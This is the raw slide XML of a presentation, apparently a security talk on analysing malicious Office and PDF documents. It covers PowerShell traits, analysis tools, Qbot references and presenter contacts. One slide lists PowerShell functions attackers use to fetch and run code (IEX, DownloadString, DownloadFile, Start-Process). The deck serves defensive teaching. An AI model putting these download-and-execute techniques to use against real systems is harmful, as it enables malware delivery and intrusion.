              <a:t>. Available at: https://cyware.com/news/qbot-trojan-prevention-and-detection-9f2bbdd2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Trojan: Mitigation and Countermeasures" by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Cyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>. Available at: https://cyware.com/news/qbot-trojan-mitigation-and-countermeasures-89d5a332</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17926BD-D277-4EE7-8D7D-6E469FED8C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20870854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BC9EE85-FB91-3844-82F0-985CBAC51633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-100706" y="4169191"/>
            <a:ext cx="9182851" cy="974309"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B35D71-EDCC-7145-B95C-6D6BEB16EAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8551863" y="-30163"/>
            <a:ext cx="592137" cy="274638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3DBEFFC9-7588-9E46-A8CC-C2BF237A9622}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5824817-8970-4015-BED8-ECB3F01CADF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-19426" y="2084595"/>
            <a:ext cx="9182851" cy="974309"/>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defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6pPr marL="457189" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914377" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371566" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828754" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open for Q&amp;A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC2877DE-A9B2-437C-A965-77AD680DE52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="128985" y="3170369"/>
            <a:ext cx="3765774" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Ashu.Sharma@watchguard.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cristobal.tarraga@watchguard.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C52B0304-2A70-201A-7569-18946B58D6F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="22234" y="717198"/>
            <a:ext cx="9182851" cy="974309"/>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ctr" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457189" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914377" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371566" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828754" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>https://github.com/ashubits/PresentationPDFMalware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3672382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232C1-6DFC-D36B-E03E-1769056B10B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>Introduction to malicious documents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02766EF-3630-958C-C27A-BC15CBDF6D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>An attack vector frequently used by malicious agents is the distribution of the malicious payload embedded in an office application document that enjoys a high market share (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> Microsoft Word, Microsoft Excel, Microsoft PowerPoint, RTF, Adobe PDF). . This malicious document is sent as an attachment to an email as part of a phishing campaign.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>In order to proceed with the analysis of these malicious documents, the analyst must first know the structure of these documents. This allows you to understand how an attacker can embed code or malware in them, as well as understanding common packaging and obfuscation techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>I'm going to do a little introduction to the following types of documents / scripts, focusing on pdf documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>HTA files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Microsoft Office  OLE2 and OOXML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>MSG Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>RTF files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>PDF Files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7464673-695A-7F74-765A-F1864B0D0ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE2AAB6-80C9-D04C-812E-2AE858C1AEC4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1711208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s-ES" dirty="0"/>
              <a:t>Powershell</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100" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> is a task-based command line shell and scripting language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Designed so that system administrators and advanced users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Based on the .NET Framework CLR (Common Language Runtime) and .NET Framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Great potential as a scripting language with full access to the internal core of the operating system and Microsoft Windows API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Full fileless.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Files like .LNK, .WSF, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, VBScript or Microsoft Office documents..  allow you to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> script directly or indirectly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Base64-encoded parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t> (Windows Remote Management)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES"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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{412B1B94-DB5C-2C93-21A2-B1601BC5F5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404844" y="2475391"/>
            <a:ext cx="2533780" cy="1987652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2102690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s-ES" dirty="0"/>
              <a:t>Powershell</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dirty="0"/>
              <a:t>The easiest way to analyze them will be dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell ISE (Integrate Scripting Environment).</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A994CD-C1DE-A2C7-D3A6-083EB9E9C7E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564249" y="1866833"/>
            <a:ext cx="3626036" cy="2578233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3647653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s-ES" dirty="0"/>
              <a:t>Powershell</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800" dirty="0"/>
              <a:t>In addition to using command line arguments, attackers can use cmdlets or the .NET API in PowerShell scripts. The following commands and functions stand out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Invoke-Expression(IEX). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Invoke-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Start-Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(). </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
